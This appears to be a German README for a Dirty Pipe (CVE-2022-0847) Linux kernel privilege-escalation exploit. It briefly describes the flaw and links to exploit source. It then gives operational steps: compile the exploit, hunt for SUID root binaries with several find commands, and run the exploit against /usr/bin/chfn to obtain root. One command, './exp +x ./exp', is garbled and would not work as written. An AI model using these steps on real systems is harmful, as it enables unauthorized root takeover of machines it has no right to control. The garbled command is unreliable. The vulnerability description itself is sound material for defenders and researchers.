
CVE-2022-0847-DirtyPipe-Exploit
Am 7. März veröffentlichte der Sicherheitsforscher Max Kellermann einen Blogbeitrag, in dem er die lokale Privilege-Escalation-Schwachstelle CVE-2022-0847 im Linux-Kernel offenlegte: https://dirtypipe.cm4all.com/
CVE-2022-0847 ist eine lokale Privilege-Escalation-Schwachstelle im Linux-Kernel ab Version 5.8. Durch Ausnutzung dieser Schwachstelle kann ein Angreifer Daten in beliebigen lesbaren Dateien überschreiben und so einen Benutzer mit normalen Rechten auf Root-Rechte anheben.
Das Prinzip der Schwachstelle CVE-2022-0847 ähnelt der Dirty-Cow-Schwachstelle (CVE-2016-5195), ist aber einfacher auszunutzen. Der Autor der Schwachstelle gab ihr den Namen "Dirty Pipe".
Link: https://haxx.in/files/dirtypipez.c
Author: Max Kellermann [email protected]
gcc -o exp exploit.c
./exp +x ./exp
# 查找suid文件
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
./exp /usr/bin/chfn
